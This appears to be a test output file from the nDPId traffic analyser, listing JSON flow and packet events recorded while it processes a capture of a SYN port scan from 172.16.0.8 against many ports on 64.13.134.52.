-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsfiUAACsGn02sEAAIQA2GNIzTHUjdU4MZAAAAAGACEAALRAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjG4AAC8GjQSsEAAIQA2GNIzSrJDdUoMYAAAAAGACEAB7\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs3y8AAC4GO0OsEAAIQA2GNIzSBJ\/dUoMYAAAAAGACDAAn8AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsOzYAADsG0jysEAAIQA2GNIzSw0\/dUoMYAAAAAGACEABlPwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsPfYAADQG1nysEAAIQA2GNIzSIGzdUoMYAAAAAGACBAAUIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsTF8AACoG0hOsEAAIQA2GNIzSLr\/dUoMYAAAAAGACDAD9zwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1gAAC4G4xqsEAAIQA2GNIzSD2ndUoMYAAAAAGACDAAdJgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsXxUAACgGwV2sEAAIQA2GNIzSFTfdUoMYAAAAAGACBAAfWAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsT44AACYG0uSsEAAIQA2GNIzSH23dUoMYAAAAAGACDAANIgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsSeUAADYGyI2sEAAIQA2GNIzSGoTdUoMYAAAAAGACDAASCwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjwoAADUGhGisEAAIQA2GNIzSFEbdUoMYAAAAAGACCAAcSQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsZewAADgGqoasEAAIQA2GNIzSBDzdUoMYAAAAAGACBAAwUwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsY04AADoGqySsEAAIQA2GNIzSGrfdUoMYAAAAAGACDAAR2AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRwAAC0GUlasEAAIQA2GNIzSn8\/dUoMYAAAAAGACCACQvwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EIAACoGOjCsEAAIQA2GNIzSJcLdUoMYAAAAAGACDAAGzQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsSRoAAC0G0lisEAAIQA2GNIzSBGPdUoMYAAAAAGACCAAsLAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs2foAAC8GP3isEAAIQA2GNIzSGPXdUoMYAAAAAGACEAAPmgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dYAADUGMZysEAAIQA2GNIzSCd3dUoMYAAAAAGACCAAmsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsjcYAADgGgqysEAAIQA2GNIzSG1jdUoMYAAAAAGACBAAZNwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsIAwAADIG9masEAAIQA2GNIzSBzDdUoMYAAAAAGACDAAlXwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsp2EAADgGaRGsEAAIQA2GNIzSARjdUoMYAAAAAGACBAAzdwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAskiYAACoGjEysEAAIQA2GNIzSBGvdUoMYAAAAAGACDAAoJAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAshE8AADYGjiOsEAAIQA2GNIzSJxLdUoMYAAAAAGACDAAFfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsrUYAADkGYiysEAAIQA2GNIzSC8ndUoMYAAAAAGACCAAkxgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 